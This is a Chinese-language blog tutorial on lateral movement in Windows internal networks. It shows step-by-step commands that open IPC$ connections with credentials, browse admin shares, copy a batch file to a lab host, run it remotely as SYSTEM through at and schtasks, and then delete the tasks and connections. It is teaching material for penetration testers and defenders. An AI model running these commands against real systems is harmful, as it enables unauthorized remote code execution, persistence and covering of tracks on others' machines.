[内网渗透]—IPC通道&计时任务

IPC

定义

IPC共享"命名管道"的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。

通过IPC$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标计算机机器中的文件,进行上传、下载等操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。

IPC$的利用条件

  1. 开启了139、445端口。ipc$可以实现远程登录及对默认共享资源的访问,而139端口的开启表示NetBIOS协议的应用。
  2. 管理员开启了默认共享。默认共享是为了方便管理员进行远程管理而默认开启的,包括c$、d$、e$等和系统目录winnt或admin$。
  3. 需要目标机器关闭如下选项:

在这里插入图片描述

获取远程主机信息

首先我们得先建立命名管道

net use \\192.168.72.134\IPC$ "admin" /user:Administrator
net use

在这里插入图片描述

查看对应磁盘的信息

dir \\192.168.72.134\c$
image-20221121213916275

使用tasklist命令的/S、/U、/P参数列出远程主机上运行的进程

tasklist /S 192.168.72.134 /U administrator /P admin

查看目标主机的时间(便于定计时任务)

net time \\192.168.72.134

计时任务

at

at是Windows自带的用于创建计划任务的命令,它主要工作在Windows Server2008之前版本中,创建计划任务的流程大致如下:

at 语法:at +时间+运行程序

1、将本地文件传入对方电脑C盘

copy "calc.bat" \\192.168.72.134\C$

2、定计时任务

at \\192.168.72.134 14:43 C:\calc .bat

也可在指定运行命令输出到指定文件

at \\192.168.72.134 14:47 cmd.exe /c "ipconfig >C:/1.txt"

在这里插入图片描述

3、清除at记录

at \\192.168.72.134 1 /delete

schtasks

at命令在2008废除了,之后用到的是schtasks

常用参数有

(Schtasks(计划任务)命令详解_一个懒鬼的博客-CSDN博客

/s:指定远程计算机的名称或 IP 地址(带有或者没有反斜杠)。默认值是本地计算机。

/p:更改用于任务的帐户密码。输入新的密码。

/f:阻止确认消息。不警告就删除任务。

/tn:标识要更改的任务。输入任务名。

/tr:指定任务运行的程序或命令。

/sc:指定计划类型。

说明
MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY指定计划的时间单位。
ONCE任务在指定的日期和时间运行一次。
ONSTART任务在每次系统启动的时候运行。可以指定启动的日期,或下一次系统启动的时候运行任务。
ONLOGON每当用户(任意用户)登录的时候,任务就运行。可以指定日期,或在下次用户登录的时候运行任务。
ONIDLE只要系统空闲了指定的时间,任务就运行。可以指定日期,或在下次系统空闲的时候运行任务。

1、创建计划任务

schtasks /create /tn test /U administrator /P admin /tr "c:\calc1.bat" /sc MINUTE /mo 1 /s 192.168.52.163 /RU system

2、执⾏计划任务

schtasks /run /tn test /s 192.168.52.163  /U administrator /P admin

3、删除计划任务

schtasks /F /delete /tn test /s 192.168.52.163 /u administrator /p admin

4、删除IPC

net use \\192.168.52.163\ipc$ /del /y

参考

IPC命名管道攻击_平凡的学者的博客-CSDN博客_ipc攻击

第5章域内横向移动分析及防御_willowpy的博客-CSDN博客

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值